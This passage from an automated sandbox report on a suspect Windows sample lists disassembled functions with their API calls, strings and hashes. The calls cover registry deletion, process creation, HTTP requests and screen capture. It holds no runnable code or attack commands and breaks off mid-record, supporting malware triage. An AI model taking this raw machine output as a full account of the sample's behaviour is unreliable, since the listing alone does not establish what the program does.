                                                                                  • Opcode ID: f733cb5097717d4aee61a161732c8174c2b76cd941165776002c46ba68afb38a
                                                                                  • Instruction ID: 7821cada6686291ab716bd48c3791a3d636f13a71ebbbacc1b6de316a6a5611b
                                                                                  • Opcode Fuzzy Hash: f733cb5097717d4aee61a161732c8174c2b76cd941165776002c46ba68afb38a
                                                                                  • Instruction Fuzzy Hash: 7B71AF31910B26EFCB20DFA8DE89AAEBBF5FF48705F108518E142A25A4D774E950CF54
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcslen
                                                                                  • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$[(
                                                                                  • API String ID: 176396367-3582721924
                                                                                  • Opcode ID: c3061b3a4e9a9f03bbfb3e23dc72eb19edd41ac1517058661b42956e4110e834
                                                                                  • Instruction ID: 1afc0a62e9120184896ab99703b8038c59aef384f14bf3436d48a896dad84891
                                                                                  • Opcode Fuzzy Hash: c3061b3a4e9a9f03bbfb3e23dc72eb19edd41ac1517058661b42956e4110e834
                                                                                  • Instruction Fuzzy Hash: FCE10432A20536BBCB18DFE4D4417EDB7A0BF28714F54815AE856A7240DB34AFA5C790
                                                                                  APIs
                                                                                  • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 001E00C6
                                                                                    • Part of subcall function 001E00ED: InitializeCriticalSectionAndSpinCount.KERNEL32(0029070C,00000FA0,AA7FB7DD,?,?,?,?,002023B3,000000FF), ref: 001E011C
                                                                                    • Part of subcall function 001E00ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,002023B3,000000FF), ref: 001E0127
                                                                                    • Part of subcall function 001E00ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,002023B3,000000FF), ref: 001E0138
                                                                                    • Part of subcall function 001E00ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 001E014E
                                                                                    • Part of subcall function 001E00ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 001E015C
                                                                                    • Part of subcall function 001E00ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 001E016A
                                                                                    • Part of subcall function 001E00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 001E0195
                                                                                    • Part of subcall function 001E00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 001E01A0
                                                                                  • ___scrt_fastfail.LIBCMT ref: 001E00E7
                                                                                    • Part of subcall function 001E00A3: __onexit.LIBCMT ref: 001E00A9
                                                                                  Strings
                                                                                  • SleepConditionVariableCS, xrefs: 001E0154
                                                                                  • WakeAllConditionVariable, xrefs: 001E0162
                                                                                  • api-ms-win-core-synch-l1-2-0.dll, xrefs: 001E0122
                                                                                  • kernel32.dll, xrefs: 001E0133
                                                                                  • InitializeConditionVariable, xrefs: 001E0148
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                  • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                  • API String ID: 66158676-1714406822
                                                                                  • Opcode ID: 52b58d8f72ae90b4af3f0a3dc021bd1e37601d8d45c517a8071835b228cdc6e6
                                                                                  • Instruction ID: 4991ff90a2916d21376ac15070da7d4c21806c360f0959c6774147d37663809c
                                                                                  • Opcode Fuzzy Hash: 52b58d8f72ae90b4af3f0a3dc021bd1e37601d8d45c517a8071835b228cdc6e6
                                                                                  • Instruction Fuzzy Hash: A1212932645B446FD7126BB5BC4DB6E73E4DB09B62F10012AFC01A6291EBB09C408A94
                                                                                  APIs
                                                                                  • CharLowerBuffW.USER32(00000000,00000000,0025CC08), ref: 00234527
                                                                                  • _wcslen.LIBCMT ref: 0023453B
                                                                                  • _wcslen.LIBCMT ref: 00234599
                                                                                  • _wcslen.LIBCMT ref: 002345F4
                                                                                  • _wcslen.LIBCMT ref: 0023463F
                                                                                  • _wcslen.LIBCMT ref: 002346A7
                                                                                    • Part of subcall function 001DF9F2: _wcslen.LIBCMT ref: 001DF9FD
                                                                                  • GetDriveTypeW.KERNEL32(?,00286BF0,00000061), ref: 00234743
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcslen$BuffCharDriveLowerType
                                                                                  • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                  • API String ID: 2055661098-1000479233
                                                                                  • Opcode ID: 764d0762e1719d4faa56e618295251d19d894325ff25f835c5febff127a9c44a
                                                                                  • Instruction ID: a33cd67f0c29e40bd9f22a0e01bb576fedc47491ea9e4cb52bdea1b5fa4a492d
                                                                                  • Opcode Fuzzy Hash: 764d0762e1719d4faa56e618295251d19d894325ff25f835c5febff127a9c44a
                                                                                  • Instruction Fuzzy Hash: 3BB111B16283029FC310EF28C891A6EB7E5AFB5724F50495DF496D7291E730E864CB92
                                                                                  APIs
                                                                                    • Part of subcall function 001D9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 001D9BB2
                                                                                  • DragQueryPoint.SHELL32(?,?), ref: 00259147
                                                                                    • Part of subcall function 00257674: ClientToScreen.USER32(?,?), ref: 0025769A
                                                                                    • Part of subcall function 00257674: GetWindowRect.USER32(?,?), ref: 00257710
                                                                                    • Part of subcall function 00257674: PtInRect.USER32(?,?,00258B89), ref: 00257720
                                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 002591B0
                                                                                  • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 002591BB
                                                                                  • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 002591DE
                                                                                  • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00259225
                                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 0025923E
                                                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 00259255
                                                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 00259277
                                                                                  • DragFinish.SHELL32(?), ref: 0025927E
                                                                                  • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00259371
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                                  • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$p#)
                                                                                  • API String ID: 221274066-855356465
                                                                                  • Opcode ID: 145e438f07b38270e7a736cf176866c0d7d7d47c6aae0f7aeb485a54fbd617bb
                                                                                  • Instruction ID: 1d37552a58c66df9c4c4c98c5b7f47e571e6fecb2e697b94ac948f02541168e7
                                                                                  • Opcode Fuzzy Hash: 145e438f07b38270e7a736cf176866c0d7d7d47c6aae0f7aeb485a54fbd617bb
                                                                                  • Instruction Fuzzy Hash: FA618A71108301AFD705DF64DC89EAFBBE8EFA9350F10092EF995921A0DB30DA59CB56
                                                                                  APIs
                                                                                  • _wcslen.LIBCMT ref: 0024B198
                                                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0024B1B0
                                                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0024B1D4
                                                                                  • _wcslen.LIBCMT ref: 0024B200
                                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0024B214
                                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0024B236
                                                                                  • _wcslen.LIBCMT ref: 0024B332
                                                                                    • Part of subcall function 002305A7: GetStdHandle.KERNEL32(000000F6), ref: 002305C6
                                                                                  • _wcslen.LIBCMT ref: 0024B34B
                                                                                  • _wcslen.LIBCMT ref: 0024B366
                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0024B3B6
                                                                                  • GetLastError.KERNEL32(00000000), ref: 0024B407
                                                                                  • CloseHandle.KERNEL32(?), ref: 0024B439
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0024B44A
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0024B45C
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0024B46E
                                                                                  • CloseHandle.KERNEL32(?), ref: 0024B4E3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                  • String ID:
                                                                                  • API String ID: 2178637699-0
                                                                                  • Opcode ID: c8769c28911c7acb35f9595115703921df8154e90f54dda942518a658a9a6574
                                                                                  • Instruction ID: 96c04722d52f4ab54ee857f696d51389559c311ab618bc67a0b899d5aa0e3235
                                                                                  • Opcode Fuzzy Hash: c8769c28911c7acb35f9595115703921df8154e90f54dda942518a658a9a6574
                                                                                  • Instruction Fuzzy Hash: F0F1DD316183419FC719EF24C891B2EBBE4AF95314F14895DF8899B2A2DB71EC10CF92
                                                                                  APIs
                                                                                  • GetMenuItemCount.USER32(00291990), ref: 00202F8D
                                                                                  • GetMenuItemCount.USER32(00291990), ref: 0020303D
                                                                                  • GetCursorPos.USER32(?), ref: 00203081
                                                                                  • SetForegroundWindow.USER32(00000000), ref: 0020308A
                                                                                  • TrackPopupMenuEx.USER32(00291990,00000000,?,00000000,00000000,00000000), ref: 0020309D
                                                                                  • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 002030A9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                  • String ID: 0
                                                                                  • API String ID: 36266755-4108050209
                                                                                  • Opcode ID: 0ef4f39d47757dd56fcfa741dc4c5932c19290e786748d404412f4d831e22f43
                                                                                  • Instruction ID: b0d4cc1948d504e624da2769b4cb3fda58688bce1d91051beadca1e921d6524f
                                                                                  • Opcode Fuzzy Hash: 0ef4f39d47757dd56fcfa741dc4c5932c19290e786748d404412f4d831e22f43
                                                                                  • Instruction Fuzzy Hash: 3C710470640316BEEB258F64DC8DFAABF69FF04364F204207F5256A1E1C7B1A924CB90
                                                                                  APIs
                                                                                  • DestroyWindow.USER32(?,?), ref: 00256DEB
                                                                                    • Part of subcall function 001C6B57: _wcslen.LIBCMT ref: 001C6B6A
                                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00256E5F
                                                                                  • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00256E81
                                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00256E94
                                                                                  • DestroyWindow.USER32(?), ref: 00256EB5
                                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,001C0000,00000000), ref: 00256EE4
                                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00256EFD
                                                                                  • GetDesktopWindow.USER32 ref: 00256F16
                                                                                  • GetWindowRect.USER32(00000000), ref: 00256F1D
                                                                                  • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00256F35
                                                                                  • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00256F4D
                                                                                    • Part of subcall function 001D9944: GetWindowLongW.USER32(?,000000EB), ref: 001D9952
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                                  • String ID: 0$tooltips_class32
                                                                                  • API String ID: 2429346358-3619404913
                                                                                  • Opcode ID: 66b4a78e83196f53cd562e174e3974cea1ae6e3152422693ad41b0a3d6c90e6a
                                                                                  • Instruction ID: 4de267f5ca1e54cb1266b9faaa4cefc28974bfa1dbadcf754fe52d8521cb6ef7
                                                                                  • Opcode Fuzzy Hash: 66b4a78e83196f53cd562e174e3974cea1ae6e3152422693ad41b0a3d6c90e6a
                                                                                  • Instruction Fuzzy Hash: F7717870504341AFEB25CF18E848FAABBE9EB99305F54051EF98987260D770ED1ACB19
                                                                                  APIs
                                                                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0023C4B0
                                                                                  • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0023C4C3
                                                                                  • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0023C4D7
                                                                                  • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0023C4F0
                                                                                  • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0023C533
                                                                                  • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0023C549
                                                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0023C554
                                                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0023C584
                                                                                  • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0023C5DC
                                                                                  • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0023C5F0
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0023C5FB
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                  • String ID:
                                                                                  • API String ID: 3800310941-3916222277
                                                                                  • Opcode ID: aef2586ffcc72167d8906f0a4b124189716cd792dcb0dedca0cff841ee02fd68
                                                                                  • Instruction ID: e5baa79ddf84d8114741ff97c0c15da9af4f70e4a34c3005d8c74243873aa56a
                                                                                  • Opcode Fuzzy Hash: aef2586ffcc72167d8906f0a4b124189716cd792dcb0dedca0cff841ee02fd68
                                                                                  • Instruction Fuzzy Hash: 275169B1510309BFDB218F60DD88AABBBBCFB08755F60441AF945E6610EB30E954DB60
                                                                                  APIs
                                                                                  • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00258592
                                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 002585A2
                                                                                  • GlobalAlloc.KERNEL32(00000002,00000000), ref: 002585AD
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 002585BA
                                                                                  • GlobalLock.KERNEL32(00000000), ref: 002585C8
                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 002585D7
                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 002585E0
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 002585E7
                                                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 002585F8
                                                                                  • OleLoadPicture.OLEAUT32(?,00000000,00000000,0025FC38,?), ref: 00258611
                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00258621
                                                                                  • GetObjectW.GDI32(?,00000018,000000FF), ref: 00258641
                                                                                  • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00258671
                                                                                  • DeleteObject.GDI32(00000000), ref: 00258699
                                                                                  • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 002586AF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                  • String ID:
                                                                                  • API String ID: 3840717409-0
                                                                                  • Opcode ID: 063683ec894ae15c119adfd8054cf0e9d12c9dc3e226dac777167d9960d91d1e
                                                                                  • Instruction ID: f279462d1153b8d0fd09cb7e7a9552e9e97f93bdd6136dbb4ef997124e4b2962
                                                                                  • Opcode Fuzzy Hash: 063683ec894ae15c119adfd8054cf0e9d12c9dc3e226dac777167d9960d91d1e
                                                                                  • Instruction Fuzzy Hash: 8B41E975610309AFDB119FA5DC4CEAA7BBCEB89712F108058F909E7260EB709945CF68
                                                                                  APIs
                                                                                  • VariantInit.OLEAUT32(00000000), ref: 00231502
                                                                                  • VariantCopy.OLEAUT32(?,?), ref: 0023150B
                                                                                  • VariantClear.OLEAUT32(?), ref: 00231517
                                                                                  • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 002315FB
                                                                                  • VarR8FromDec.OLEAUT32(?,?), ref: 00231657
                                                                                  • VariantInit.OLEAUT32(?), ref: 00231708
                                                                                  • SysFreeString.OLEAUT32(?), ref: 0023178C
                                                                                  • VariantClear.OLEAUT32(?), ref: 002317D8
                                                                                  • VariantClear.OLEAUT32(?), ref: 002317E7
                                                                                  • VariantInit.OLEAUT32(00000000), ref: 00231823
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                                                                  • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                  • API String ID: 1234038744-3931177956
                                                                                  • Opcode ID: 642b87711ef4da05862b01b8e2a66bba89992291bd4beb57ba785f7366a4bb94
                                                                                  • Instruction ID: 6fa39067745a014571b0ac358fb5b91d53f57ec489d3bc44982603c3a864e99e
                                                                                  • Opcode Fuzzy Hash: 642b87711ef4da05862b01b8e2a66bba89992291bd4beb57ba785f7366a4bb94
                                                                                  • Instruction Fuzzy Hash: EDD112B1A20205EBDB10EF65E889B7DB7B5BF44700F64845AF406AB280DB70ED71DB61
                                                                                  APIs
                                                                                    • Part of subcall function 001C9CB3: _wcslen.LIBCMT ref: 001C9CBD
                                                                                    • Part of subcall function 0024C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0024B6AE,?,?), ref: 0024C9B5
                                                                                    • Part of subcall function 0024C998: _wcslen.LIBCMT ref: 0024C9F1
                                                                                    • Part of subcall function 0024C998: _wcslen.LIBCMT ref: 0024CA68
                                                                                    • Part of subcall function 0024C998: _wcslen.LIBCMT ref: 0024CA9E
                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0024B6F4
                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0024B772
                                                                                  • RegDeleteValueW.ADVAPI32(?,?), ref: 0024B80A
                                                                                  • RegCloseKey.ADVAPI32(?), ref: 0024B87E
                                                                                  • RegCloseKey.ADVAPI32(?), ref: 0024B89C
                                                                                  • LoadLibraryA.KERNEL32(advapi32.dll), ref: 0024B8F2
                                                                                  • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0024B904
                                                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 0024B922
                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 0024B983
                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0024B994
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                                  • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                  • API String ID: 146587525-4033151799
                                                                                  • Opcode ID: b0ff5f23711ff42b154ad5c6ec18f65649026a5074634dfcddb2bed9d68dbb1d
                                                                                  • Instruction ID: 8babad650adb0ddc0fda862d0b38de4cd7e7867578fcf35429aee6f6adb6684e
                                                                                  • Opcode Fuzzy Hash: b0ff5f23711ff42b154ad5c6ec18f65649026a5074634dfcddb2bed9d68dbb1d
                                                                                  • Instruction Fuzzy Hash: F8C19C35218202AFD719DF24C495F2ABBE5BF94318F14845CF49A8B2A2CB71EC56CF91
                                                                                  APIs
                                                                                  • GetDC.USER32(00000000), ref: 002425D8
                                                                                  • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 002425E8
                                                                                  • CreateCompatibleDC.GDI32(?), ref: 002425F4
                                                                                  • SelectObject.GDI32(00000000,?), ref: 00242601
                                                                                  • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 0024266D
                                                                                  • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 002426AC
                                                                                  • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 002426D0
                                                                                  • SelectObject.GDI32(?,?), ref: 002426D8
                                                                                  • DeleteObject.GDI32(?), ref: 002426E1
                                                                                  • DeleteDC.GDI32(?), ref: 002426E8
                                                                                  • ReleaseDC.USER32(00000000,?), ref: 002426F3
                                                                                  Strings
                                                                                  Memory Dump Source
